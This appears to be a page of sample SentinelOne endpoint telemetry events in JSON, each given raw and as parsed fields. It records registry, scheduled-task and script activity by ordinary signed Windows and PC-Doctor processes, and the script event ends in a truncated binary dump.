\"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": 
\"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH19\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785108304\"}, \"event_type\": \"regValueCreate\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"regValue\": {\"key\": {}, \"path\": \"MACHINE\\\\BCD00000000\\\\Objects\\\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\\\Elements\\\\12000002\\\\Element\"}, \"valueType\": 1, \"source\": {\"node\": {\"key\": {\"value\": \"C02A3567256C6DE9\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"61D0DBC75EA434C4\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\system32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe\", \"fullPid\": {\"pid\": 25104, \"startTime\": {\"millisecondsSinceEpoch\": \"1631775524677\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6186\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"7A33A49AFDF1C571\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 15, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"counters\": {\"moduleLoad\": 52}}}", - "event": { - "action": "regValueCreate", - "start": "2021-09-16T09:38:28.304000Z" - }, - 
"agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 10, - "trace_id": "7892FB424053407899299D5319FEB9C5", - "uuid": "bfd21e8929fd49768299fae02a0557a6" - }, - "event": { - "type": "regValueCreate" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "module_load": 52 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\system32\\taskhostw.exe", - "node": { - "key": "61D0DBC75EA434C4" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "C02A3567256C6DE9" - }, - "parent": { - "node": { - "key": "7A33A49AFDF1C571" - } - }, - "root": "E_FALSE", - "session_id": 15, - "true_context": { - "key": "D1A7307582B51DFF" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - } - }, - "registry": { - "value_type": "1" - }, - "true_context": { - "key": "D1A7307582B51DFF" - } - }, - "host": { - "name": "LAPTOP-TECH19", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "taskhostw.exe", - "executable": "C:\\Windows\\system32\\taskhostw.exe", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, - "name": "taskhostw.exe", - "pid": 25104, - "start": "2021-09-16T06:58:44.677000Z", - "title": "Host Process for Windows Tasks", - "working_directory": "C:\\Windows\\system32" - }, - "registry": { - "data": { - "type": "REG_SZ" - }, - "path": 
"MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\12000002\\Element", - "value": "Element" - }, - "related": { - "hash": [ - "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "564e4806ab18f93b93d551cd10c1598e", - "fed4b4a753a9541389aa670c69e624be07569ccd" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6186", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "reg_value_delete.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 43, \"uuid\": \"19f22913365942f2afeed1463c96104b\", \"traceId\": \"63014A4A2D8B42148CBD53DA4C5937A8\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM11\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785105794\"}, \"event_type\": \"regValueDelete\", \"trueContext\": {\"key\": {\"value\": \"6508114A467ECCA8\"}}, \"regValue\": {\"key\": {}, \"path\": \"MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SentinelDeviceControl\\\\Enum\\\\53\"}, \"source\": {\"node\": {\"key\": {\"value\": \"1BA4624EB033A7CC\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"AC786EF3445E33CE\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\ntoskrnl.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"10848576\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"560b6a3b55112d9834e28def41d5ac3de0e03928\"}}, \"fullPid\": {\"pid\": 4, \"startTime\": {\"millisecondsSinceEpoch\": \"1631781067519\"}}, \"user\": {\"name\": \"SYSTEM\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"1BA4624EB033A7CC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"NT 
Kernel & System\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6508114A467ECCA8\"}}, \"counters\": {\"modelChildProcess\": 2, \"osChildProcess\": 2, \"fileModification\": 1, \"netConnIn\": 16, \"netConnOut\": 26}}}", - "event": { - "action": "regValueDelete", - "start": "2021-09-16T09:38:25.794000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 43, - "trace_id": "63014A4A2D8B42148CBD53DA4C5937A8", - "uuid": "19f22913365942f2afeed1463c96104b" - }, - "event": { - "type": "regValueDelete" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "file_modification": 1, - "model_child_process": 2, - "net_conn_out": 26, - "os_child_process": 2 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\ntoskrnl.exe", - "node": { - "key": "AC786EF3445E33CE" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "10848576", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "1BA4624EB033A7CC" - }, - "parent": { - "node": { - "key": "1BA4624EB033A7CC" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "6508114A467ECCA8" - } - }, - "true_context": { - "key": "6508114A467ECCA8" - } - }, - "host": { - "name": "LAPTOP-COM11", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "executable": "C:\\Windows\\System32\\ntoskrnl.exe", - "hash": { - "sha1": "560b6a3b55112d9834e28def41d5ac3de0e03928" - }, - "name": "ntoskrnl.exe", - "pid": 4, - "start": 
"2021-09-16T08:31:07.519000Z", - "title": "NT Kernel & System", - "working_directory": "C:\\Windows\\System32" - }, - "registry": { - "path": "MACHINE\\SYSTEM\\ControlSet001\\Services\\SentinelDeviceControl\\Enum\\53", - "value": "53" - }, - "related": { - "hash": [ - "560b6a3b55112d9834e28def41d5ac3de0e03928" - ], - "user": [ - "SYSTEM" - ] - }, - "user": { - "name": "SYSTEM" - } - } - - ``` - - -=== "reg_value_modified.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 133, \"uuid\": \"4d311e18709146cba8797a22e3c20762\", \"traceId\": \"8D9114CB762D473FAA5189BD13762FB2\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785156204\"}, \"event_type\": \"regValueModified\", \"trueContext\": {\"key\": {\"value\": \"B3E0EF7ECFD0D296\"}}, \"regValue\": {\"key\": {}, \"path\": \"MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4d36e96c-e325-11ce-bfc1-08002be10318}\\\\0003\\\\GlobalSettings\\\\AnalogDigitalCapture\\\\Node000\\\\Chan001\"}, \"oldValueType\": 1, \"newValueType\": 3, \"source\": {\"node\": {\"key\": {\"value\": \"645A938883C36D21\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"294CA423F5D3A1E5\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\Windows\\\\System32\\\\svchost.exe -k 
LocalServiceNetworkRestricted -p\", \"fullPid\": {\"pid\": 3504, \"startTime\": {\"millisecondsSinceEpoch\": \"1631625850355\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\SERVICE LOCAL\", \"sid\": \"S-1-5-19\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"DEF87C2AB48B84DC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"B3E0EF7ECFD0D296\"}}, \"counters\": {\"modelChildProcess\": 25, \"osChildProcess\": 25, \"moduleLoad\": 87}}, \"oldValueData\": \"00C0F0FF\", \"newValueData\": \"0040EEFF\"}", - "event": { - "action": "regValueModified", - "start": "2021-09-16T09:39:16.204000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 133, - "trace_id": "8D9114CB762D473FAA5189BD13762FB2", - "uuid": "4d311e18709146cba8797a22e3c20762" - }, - "event": { - "type": "regValueModified" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "model_child_process": 25, - "module_load": 87, - "os_child_process": 25 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\svchost.exe", - "node": { - "key": "294CA423F5D3A1E5" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "57360", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "645A938883C36D21" - }, - "parent": { - "node": { - "key": "DEF87C2AB48B84DC" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "B3E0EF7ECFD0D296" - 
}, - "user": { - "sid": "S-1-5-19" - } - }, - "registry": { - "new": { - "value_type": "3" - }, - "old": { - "data": { - "strings": [ - "00C0F0FF" - ], - "type": "REG_SZ" - }, - "value_type": "1" - } - }, - "true_context": { - "key": "B3E0EF7ECFD0D296" - } - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", - "executable": "C:\\Windows\\System32\\svchost.exe", - "hash": { - "md5": "f586835082f632dc8d9404d83bc16316", - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7" - }, - "name": "svchost.exe", - "pid": 3504, - "start": "2021-09-14T13:24:10.355000Z", - "title": "Host Process for Windows Services", - "working_directory": "C:\\Windows\\System32" - }, - "registry": { - "data": { - "bytes": "0040EEFF", - "type": "REG_BINARY" - }, - "path": "MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e96c-e325-11ce-bfc1-08002be10318}\\0003\\GlobalSettings\\AnalogDigitalCapture\\Node000\\Chan001", - "value": "Chan001" - }, - "related": { - "hash": [ - "010db07461e45b41c886192df6fd425ba8d42d82", - "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "f586835082f632dc8d9404d83bc16316" - ], - "user": [ - "AUTORITE NT\\SERVICE LOCAL" - ] - }, - "user": { - "id": "S-1-5-19", - "name": "AUTORITE NT\\SERVICE LOCAL" - } - } - - ``` - - -=== "sched_task_update.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 63, \"uuid\": \"bcc4bf7a284441599707050e1d58a8dd\", \"traceId\": \"CEBBC94D38B041B1B2DE01C315EB28F5\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH15\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": 
{\"millisecondsSinceEpoch\": \"1631634708620\"}, \"event_type\": \"schedTaskUpdate\", \"trueContext\": {\"key\": {\"value\": \"4FE2F2ADB5655DDF\"}}, \"taskName\": \"\\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\Schedule Maintenance Work\", \"source\": {\"node\": {\"key\": {\"value\": \"38F2355042BA2367\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"99892497510C239E\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\MoUsoCoreWorker.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"1614848\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a5a6716e38b06d44f4803b5167db2a0862b1d6bf\", \"sha256\": \"a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d\", \"md5\": \"475c5e07f8375dab6e5888301b1705e6\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\Windows\\\\System32\\\\mousocoreworker.exe -Embedding\", \"fullPid\": {\"pid\": 8588, \"startTime\": {\"millisecondsSinceEpoch\": \"1631289768083\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"B485A24CFF4A8D31\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"MoUSO Core Worker Process\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"4FE2F2ADB5655DDF\"}}, \"counters\": {\"modelChildProcess\": 1, \"osChildProcess\": 1, \"moduleLoad\": 1158, \"netConnOut\": 7, \"dnsLookups\": 1}}}", - "event": { - "action": "schedTaskUpdate", - "start": "2021-09-14T15:51:48.620000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 63, - "trace_id": 
"CEBBC94D38B041B1B2DE01C315EB28F5", - "uuid": "bcc4bf7a284441599707050e1d58a8dd" - }, - "event": { - "type": "schedTaskUpdate" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 1, - "model_child_process": 1, - "module_load": 1158, - "net_conn_out": 7, - "os_child_process": 1 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\MoUsoCoreWorker.exe", - "node": { - "key": "99892497510C239E" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "1614848", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "38F2355042BA2367" - }, - "parent": { - "node": { - "key": "B485A24CFF4A8D31" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "4FE2F2ADB5655DDF" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "scheduled_task": { - "name": "\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Maintenance Work" - }, - "true_context": { - "key": "4FE2F2ADB5655DDF" - } - }, - "host": { - "name": "LAPTOP-TECH15", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\Windows\\System32\\mousocoreworker.exe -Embedding", - "executable": "C:\\WINDOWS\\system32\\MoUsoCoreWorker.exe", - "hash": { - "md5": "475c5e07f8375dab6e5888301b1705e6", - "sha1": "a5a6716e38b06d44f4803b5167db2a0862b1d6bf", - "sha256": "a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d" - }, - "name": "MoUsoCoreWorker.exe", - "pid": 8588, - "start": "2021-09-10T16:02:48.083000Z", - "title": "MoUSO Core Worker Process", - "working_directory": "C:\\WINDOWS\\system32" - }, - "related": { - "hash": [ - "475c5e07f8375dab6e5888301b1705e6", - "a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d", - 
"a5a6716e38b06d44f4803b5167db2a0862b1d6bf" - ], - "user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "script.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFQFVBJWAT35E5D075MQ1408\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631802162798\"}, \"event_type\": \"scripts\", \"source\": {\"node\": {\"key\": {\"value\": \"35A565744E7A266A\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"FBFFF74AA755328C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\ProgramData\\\\PCDr\\\\CSAW\\\\CSAW_Child.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"5518152\", \"signature\": {\"signed\": {\"identity\": \"PC-DOCTOR, INC.\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d\", \"sha256\": \"e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa\", \"md5\": \"423050654da76dab9c2866ba3c13ce38\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\ProgramData\\\\PCDr\\\\CSAW\\\\CSAW_Child.exe\\\" /child\", \"fullPid\": {\"pid\": 14832, \"startTime\": {\"millisecondsSinceEpoch\": \"1631802162671\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"04DEDAAF23E16398\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"DED9F9357E5C5C30\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1631802160011\"}, \"path\": \"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Roaming\\\\PCDr\\\\Update\\\\Binaries\\\\CSAW.exe\", \"owner\": 
{}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"5518152\", \"signature\": {\"signed\": {\"identity\": \"PC-DOCTOR, INC.\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d\", \"sha256\": \"e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa\", \"md5\": \"423050654da76dab9c2866ba3c13ce38\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Roaming\\\\PCDr\\\\Update\\\\Binaries\\\\CSAW.exe\\\" /NA /noui\", \"fullPid\": {\"pid\": 1780, \"startTime\": {\"millisecondsSinceEpoch\": \"1631802161886\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"EDA8D6AB348AAE7D\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \" \", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_TRUE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B21DD2505AAA5F2\"}}, \"counters\": {\"modelChildProcess\": 1, \"osChildProcess\": 1, \"crossProcess\": 2, \"moduleLoad\": 237, \"fileCreation\": 1, \"fileDeletion\": 1, \"fileModification\": 32, \"exeModification\": 3, \"netConnOut\": 2, \"registryModification\": 3, \"crossProcessDupProcessHandle\": 2}}, \"excluded\": \"E_FALSE\", \"name\": \" \", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_TRUE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B21DD2505AAA5F2\"}}, \"counters\": {\"moduleLoad\": 224, \"fileCreation\": 3, \"fileDeletion\": 3, \"fileModification\": 33, \"netConnOut\": 3, \"registryModification\": 1, \"dnsLookups\": 1}}, \"targetFile\": {\"node\": {\"key\": {}}, \"creationTime\": {}, \"owner\": {}, \"hashes\": {}}, \"content\": 
\"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\", \"contentHash\": {\"sha256\": \"2d12874ce5eff797003e69815c70c9dce5876e4062e3162c3bad65d20831d5cb\"}, \"originalSize\": \"612864\", \"appName\": \"DotNet\", \"decodedContent\": \"\\u5a4d\\u0090\\u0003\\u0000\\u0004\\u0000\\uffff\\u0000\\u00b8\\u0000\\u0000\\u0000@\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0080\\u0000\\u1f0e\\u0eba\\ub400\\ucd09\\ub821\\u4c01\\u21cd\\u6854\\u7369\\u7020\\u6f72\\u7267\\u6d61\\u6320\\u6e61\\u6f6e\\u2074\\u6562\\u7220\\u6e75\\u6920\\u206e\\u4f44\\u2053\\u6f6d\\u6564\\u0d2e\\u0a0d$\\u0000\\u0000\\u0000\\u4550\\u0000\\u014c\\u0003\\ueb01\\u5a95\\u0000\\u0000\\u0000\\u0000\\u00e0\\u2102\\u010b\\u000b\\u5200\\t\\u0600\\u0000\\u0000\\u0000\\u70ae\\t\\u2000\\u0000\\u8000\\t\\u0000\\u1000\\u2000\\u0000\\u0200\\u0000\\u0004\\u0000\\u0000\\u0000\\u0006\\u0000\\u0000\\u0000\\uc000\\t\\u0200\\u0000\\u9006\\t\\u0003\\u8560\\u0000\\u0010\\u1000\\u0000\\u0000\\u0010\\u1000\\u0000\\u0000\\u0000\\u0010\\u0000\\u0000\\u0000\\u0000\\u0000\\u7058\\tS\\u0000\\u8000\\t\\u03f0\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ua000\\t\\f\\u0000\\u6f20\\t\\u001c\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u2000\\u0000\\b\\u0000\\u0000\\u0000\\u0000\\u0000\\u2008\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u742e\\u7865t\\u0000\\u50b4\\t\\u2000\\u0000\\u5200\\t\\u0200\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000 
\\u6000\\u722e\\u7273c\\u0000\\u03f0\\u0000\\u8000\\t\\u0400\\u0000\\u5400\\t\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000@\\u4000\\u722e\\u6c65\\u636f\\u0000\\f\\u0000\\ua000\\t\\u0200\\u0000\\u5800\\t\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000@\\u4200\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u7090\\t\\u0000\\u0000H\\u0000\\u0002\\u0005\\uc3ac\\u0003\\uab74\\u0005\\t\\u0000\\u0000\\u0000\\ub900\\u0002\\u0aaa\\u0001\\u2050\\u0000\\u0080\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ue6a3\\u8233\\ufffd\\uffc6\\ubf62\\u5231\\u2bf1\\uc246\\u28c3\\ua650\\ue501\\uc6a7\\uf8fd\\uba71\\u78c1\\u6a88\\u1eba\\u07ac\\u1acf\\u9528\\uc041\\u1735\\u105b\\ube12\\u6429\\ucc1c\\ubb66\\u725d\\ue31e\\u0462\\ub239\\uc676\\ubeee\\u4969\\ucdb5\\u5b42\\u25a9\\uc392\\u5d50\\u99c8\\ue5c4\\uba43\\u02db\\u6210\\u8997\\uc1db\\u05e3\\u0107\\u113d\\u05fc\\u6fc3\\ub335\\uf0be\\u171e\\ub204\\u565f\\u4bb8\\u1e51\\u3276\\u32f2\\ud6c2\\ufffd\\u7254\\u2e32\\u021e\\u2428\\u0000\\u2a0a\\u021e\\u2428\\u0000\\u2a0a\\u023a\\u2428\\u0000\\u020a\\u2803\\u0005\\u0600\\u1e2a\\u7b02\\u0001\\u0400\\u222a\\u0302\\u017d\\u0000\\u2a04\\u021e\\u2428\\u0000\\u2a0a\\u021e\\u2428\\u0000\\u2a0a\\u023a\\u2428\\u0000\\u020a\\u2803\\n\\u0600\\u1e2a\\u7b02\\u0002\\u0400\\u222a\\u0302\\u027d\\u0000\\u2a04\\u0226\\u1603\\u0c28\\u0000\\u2a06\\u0256\\u2428\\u0000\\u020a\\u2803\\u000e\\u0600\\u0402\\u1028\\u0000\\u2a06\\u021e\\u037b\\u0000\\u2a04\\u0222\\u7d03\\u0003\\u0400\\u1e2a\\u7b02\\u0004\\u0400\\u222a\\u0302\\u047d\\u0000\\u2a04\\u0222\\u2817\\u0012\\u0600\\u3a2a\\u2802$\\u0a00\\u0302\\u1428\\u0000\\u2a06\\u021e\\u057b\\u0000\\u2a04\\u0222\\u7d03\\u0005\\u0400\\u1e2a\\u2802$\\u0a00\\u3a2a\\u2802$\\u0a00\\u0302\\u1828\\u0000\\u2a06\\u021e\\u067b\\u0000\\u2a04\\u0222\\u7d03\\u0006\\u0400\\u262a\\u1d02\\u2817\\u001c\\u0600\\u262a\\u0302\\u2817\\u001c\\u0600\\u262a\\u1